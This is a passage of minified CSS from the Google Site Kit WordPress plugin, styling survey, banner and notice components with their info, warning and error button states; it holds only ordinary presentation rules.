.googlesitekit-survey__footer{padding:0 16px 16px;position:relative;text-align:right}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-survey__footer{padding:0 24px 24px}}.googlesitekit-plugin .googlesitekit-survey__footer p{border-top:1px solid #ebeef0;color:#6c726e;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;letter-spacing:.2px;margin:12px 0 0;padding-top:12px;text-align:left}.googlesitekit-plugin .googlesitekit-survey__footer .googlesitekit-survey__terms{margin:0;padding-top:12px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-survey__footer .googlesitekit-survey__terms{margin:0 0 -12px}}.googlesitekit-plugin .googlesitekit-survey__footer .mdc-button{letter-spacing:.25px}.googlesitekit-plugin .googlesitekit-survey__choice p{color:#6c726e;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:6px 0 0}.googlesitekit-plugin .googlesitekit-survey__choice:first-child{margin-left:8px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-survey__choice:first-child{margin-left:15px}}.googlesitekit-plugin .googlesitekit-survey__choice:first-child p{transform:translateX(9px)}.googlesitekit-plugin .googlesitekit-survey__choice:last-child{margin-right:7px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-survey__choice:last-child{margin-right:17px}}.googlesitekit-plugin .googlesitekit-survey__choice:last-child p{transform:translateX(-9px)}.googlesitekit-plugin .googlesitekit-survey__choice:not(:first-child,:last-child) p{display:none}.googlesitekit-plugin .googlesitekit-survey__choice .mdc-button:not(:disabled){background-color:transparent;border-radius:50%;box-shadow:none;color:#5f6561;height:50px;min-width:50px;padding:0;transition:background .2s ease-in-out;width:50px}.googlesitekit-plugin .googlesitekit-survey__choice .mdc-button:not(:disabled):hover,.googlesitekit-plugin .googlesitekit-survey__choice .mdc-button:not(:disabled):focus{background-color:#ebeef0}.googlesitekit-plugin .googlesitekit-survey__multi-select .googlesitekit-survey__body{padding:16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-survey__multi-select .googlesitekit-survey__body{padding:16px 24px}}.googlesitekit-plugin .googlesitekit-survey__multi-select .googlesitekit-survey__multi-select__choice{align-items:center;display:flex;flex-wrap:wrap}.googlesitekit-plugin .googlesitekit-survey__multi-select .googlesitekit-survey__multi-select__choice .mdc-text-field{flex-grow:1;height:35px;margin-left:10px;width:auto}.googlesitekit-plugin .googlesitekit-survey__multi-select .googlesitekit-survey__multi-select__choice .mdc-text-field .mdc-text-field__input{background:transparent;font-size:12px;letter-spacing:.2px}.googlesitekit-plugin .googlesitekit-survey__multi-select .googlesitekit-survey__multi-select__choice--disabled{opacity:.25}.googlesitekit-plugin .googlesitekit-survey__multi-select .googlesitekit-survey__multi-select__choice--disabled :hover{cursor:default}.googlesitekit-plugin .googlesitekit-survey__completion .googlesitekit-survey__body{color:#5f6561;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:400;letter-spacing:.2px;line-height:1.33;padding:0 16px 16px 56px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-survey__completion .googlesitekit-survey__body{padding-left:70px;padding-right:24px}}.googlesitekit-survey__open-text .mdc-text-field{margin-bottom:16px}.googlesitekit-survey__open-text .mdc-text-field-helper-line{padding-left:0}.googlesitekit-survey__open-text .googlesitekit-survey__body{align-items:center;display:flex;flex-direction:column;justify-content:center;padding:16px}@media(min-width: 960px){.googlesitekit-survey__open-text .googlesitekit-survey__body{padding:24px}}.googlesitekit-single-select .googlesitekit-survey__body{padding:16px}@media(min-width: 960px){.googlesitekit-single-select .googlesitekit-survey__body{padding:16px 24px}}.googlesitekit-single-select .googlesitekit-single-select__choice{align-items:center;display:flex;flex-wrap:wrap}.googlesitekit-single-select .mdc-text-field{flex-grow:1;height:35px;margin-left:10px;width:auto}.googlesitekit-single-select .mdc-text-field .mdc-text-field__input{background:transparent;font-size:12px;letter-spacing:.2px}.googlesitekit-single-select .mdc-form-field>label{padding:5px 0 5px 4px}.googlesitekit-banner{background-color:#fff;display:grid;grid-template-columns:1fr}@media(min-width: 961px){.googlesitekit-banner{grid-template-columns:1fr 40%}}@media(min-width: 1281px){.googlesitekit-banner{grid-template-columns:1fr 400px}}.googlesitekit-banner .googlesitekit-banner__content{padding:16px}@media(min-width: 601px){.googlesitekit-banner .googlesitekit-banner__content{min-height:188px;padding:24px}}.googlesitekit-banner .googlesitekit-banner__footer{border-top:1px solid #ebeef0;grid-column:1/-1;padding:24px}.googlesitekit-banner .googlesitekit-banner__footer p{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:500;line-height:1.43}.googlesitekit-banner .googlesitekit-banner__title-icon{height:52px;margin-bottom:4px;width:52px}.googlesitekit-banner p.googlesitekit-banner__title{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:16px;font-weight:500;letter-spacing:.1px;line-height:1.25;margin:0 0 10px}@media(min-width: 601px){.googlesitekit-banner p.googlesitekit-banner__title{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:22px;font-weight:400;letter-spacing:0;line-height:1.27;margin:0 0 8px}}@media(min-width: 961px){.googlesitekit-banner p.googlesitekit-banner__title{font-size:28px;line-height:1.286}}.googlesitekit-banner .googlesitekit-banner__description,.googlesitekit-banner .googlesitekit-banner__description p{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-weight:400;letter-spacing:.2px;line-height:1.33;margin:0}@media(min-width: 601px){.googlesitekit-banner .googlesitekit-banner__description,.googlesitekit-banner .googlesitekit-banner__description p{font-size:14px;letter-spacing:.25px;line-height:1.43}}@media(min-width: 961px){.googlesitekit-banner .googlesitekit-banner__description,.googlesitekit-banner .googlesitekit-banner__description p{font-size:16px;letter-spacing:.5px;line-height:1.5}}.googlesitekit-banner .googlesitekit-banner__description p{margin-bottom:10px}.googlesitekit-banner .googlesitekit-banner__description p:first-child{margin-top:0}.googlesitekit-banner .googlesitekit-banner__description p:last-child{margin-bottom:0}.googlesitekit-banner p.googlesitekit-banner__help-text{color:#6c726e;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;letter-spacing:.2px;line-height:1.33;margin-bottom:0}.googlesitekit-banner .googlesitekit-notice{margin-top:20px}.googlesitekit-banner .googlesitekit-notice__action>.mdc-button{gap:0 6px;margin-right:10px;margin-top:20px}.googlesitekit-banner .googlesitekit-banner__svg-wrapper{background-position:center bottom;background-repeat:no-repeat;background-size:contain;height:146px;margin:0 auto;width:90%}@media(min-width: 961px){.googlesitekit-banner .googlesitekit-banner__svg-wrapper{background-position-x:right;background-repeat:no-repeat;background-size:100%;height:100%;width:100%}}@media(min-width: 961px){.googlesitekit-banner .googlesitekit-notice__action{margin-bottom:10px}.googlesitekit-banner .googlesitekit-banner__svg-wrapper--top{background-position-y:top}.googlesitekit-banner .googlesitekit-banner__svg-wrapper--center{background-position-y:center}.googlesitekit-banner .googlesitekit-banner__svg-wrapper--bottom{background-position-y:bottom}}.googlesitekit-banner--setup-cta{border-radius:24px}.googlesitekit-banner__progress-bar{margin-bottom:3px}.googlesitekit-banner__progress-bar .mdc-linear-progress__buffer{background-color:#d0fbe1}.googlesitekit-banner__progress-bar .mdc-linear-progress__bar-inner{background-color:#77ad8c}.googlesitekit-widget-context--with-progress-bar{padding-top:0}.googlesitekit-notice{align-items:flex-start;background-color:#b8e5ca;border-radius:16px;color:#265c3b;display:flex;flex-direction:column;gap:10px;padding:14px 16px}@media(min-width: 600px){.googlesitekit-notice{align-items:center;flex-direction:row;gap:16px;padding:14px 24px}}.googlesitekit-notice .googlesitekit-notice__icon{display:flex}.googlesitekit-notice .googlesitekit-notice__content{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-weight:400;line-height:1.14}@media(min-width: 600px){.googlesitekit-notice .googlesitekit-notice__content{flex:1}}.googlesitekit-notice .googlesitekit-notice__content svg{fill:none}.googlesitekit-notice .googlesitekit-notice__content svg path:not([stroke*=currentColor]){fill:currentColor}.googlesitekit-notice .googlesitekit-notice__content p{margin:0 0 10px}@media(min-width: 600px){.googlesitekit-notice .googlesitekit-notice__content p{margin:0}}.googlesitekit-notice .googlesitekit-notice__content p>a,.googlesitekit-notice .googlesitekit-notice__content p>span>a{color:inherit;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-notice .googlesitekit-notice__content .googlesitekit-notice__title{font-weight:500}.googlesitekit-notice .googlesitekit-notice__content:not(:has(+.googlesitekit-notice__action)) .googlesitekit-notice__description{margin:0}.googlesitekit-notice.googlesitekit-notice--small{padding:8px 16px}.googlesitekit-notice.googlesitekit-notice--small .googlesitekit-notice__content p{font-size:12px}.googlesitekit-notice.googlesitekit-notice--square{border-radius:0}.googlesitekit-notice.googlesitekit-notice--bottom-margin{margin-bottom:24px}.googlesitekit-notice .mdc-button{border-radius:100px;margin:0 auto;min-height:32px;padding:6px 16px}.googlesitekit-notice .mdc-button.mdc-button--tertiary:not(:disabled){color:#265c3b}@media(min-width: 600px){.googlesitekit-notice .mdc-button{margin:0}}.googlesitekit-notice .mdc-button.mdc-button--raised{padding:6px 16px}.googlesitekit-notice .googlesitekit-notice__action{align-items:center;display:flex;flex-wrap:wrap;gap:16px;justify-content:end;width:100%}@media(min-width: 600px){.googlesitekit-notice .googlesitekit-notice__action{justify-content:initial;width:initial}}.googlesitekit-notice .googlesitekit-notice__action .mdc-button{margin:0}.googlesitekit-notice .googlesitekit-notice__cta:not(.googlesitekit-notice__cta--spinner__running) svg{margin-inline-start:6px}.googlesitekit-notice.googlesitekit-notice--success .googlesitekit-notice__icon svg{height:24px;width:24px}.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__content,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__content{color:#161b18}.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta:not(:disabled){background-color:#161b18}.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta::before,.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta::after,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta::before,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta::before,.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta::after,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta::before,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta:hover::before,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta:hover::before{opacity:.08}.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta.mdc-ripple-upgraded--background-focused::before,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta:not(.mdc-ripple-upgraded)::after,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta:not(.mdc-ripple-upgraded):active::after,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__cta.mdc-ripple-upgraded,.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__cta.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:not(:disabled){color:#161b18}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover:not(:disabled){background-color:rgba(22,27,24,.08)}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover:hover::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover:hover::before{opacity:.08}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover.mdc-ripple-upgraded--background-focused::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded)::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):active::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover.mdc-ripple-upgraded,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:hover:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:hover:not(:disabled){color:#161b18}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus:not(:disabled){background-color:rgba(22,27,24,.26)}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active::after,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active::after,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active:hover::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus:hover::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active:hover::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus:hover::before{opacity:.08}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus.mdc-ripple-upgraded--background-focused::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded)::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):active::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active.mdc-ripple-upgraded,.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus.mdc-ripple-upgraded,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active.mdc-ripple-upgraded,.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info .mdc-button--tertiary:focus:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--info-alt .mdc-button--tertiary:focus:not(:disabled){color:#161b18}.googlesitekit-notice.googlesitekit-notice--info{background-color:#f3f5f7}.googlesitekit-notice.googlesitekit-notice--info .googlesitekit-notice__icon{color:#161b18}.googlesitekit-notice.googlesitekit-notice--info-alt{background-color:#fff}.googlesitekit-notice.googlesitekit-notice--info-alt .googlesitekit-notice__icon{color:#6c726e}.googlesitekit-notice.googlesitekit-notice--warning{background-color:#ffe4b1}.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__icon,.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__content{color:#4e3300}.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta:not(:disabled){background-color:#4e3300}.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta::before,.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta::before,.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta:hover::before{opacity:.08}.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--warning .googlesitekit-notice__cta.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:not(:disabled){color:#4e3300}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover:not(:disabled){background-color:rgba(225,177,85,.6)}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover:hover::before{opacity:.04}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:hover:not(:disabled){color:#4e3300}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus:not(:disabled){background-color:#e1b155}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active::after,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active::after,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active:hover::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus:hover::before{opacity:.04}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active.mdc-ripple-upgraded,.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:active:not(:disabled),.googlesitekit-notice.googlesitekit-notice--warning .mdc-button--tertiary:focus:not(:disabled){color:#4e3300}.googlesitekit-notice.googlesitekit-notice--error{background-color:#ffded3}.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__icon,.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__content,.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__content p{color:#7a1e00}.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta:not(:disabled){background-color:#7a1e00}.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta:not(:disabled){color:#fff;color:var(--mdc-theme-text-primary-on-dark, white)}.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta::before,.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta::after{background-color:#fff}@supports not (-ms-ime-align: auto){.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta::before,.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta::after{background-color:var(--mdc-theme-text-primary-on-dark, white)}}.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta:hover::before{opacity:.08}.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.24}.googlesitekit-notice.googlesitekit-notice--error .googlesitekit-notice__cta.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.24}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:not(:disabled){color:#7a1e00}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover:not(:disabled){background-color:rgba(255,194,174,.6)}.googlesitekit-notice.googlesitekit-notice--error .mdc-button--tertiary:hover:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 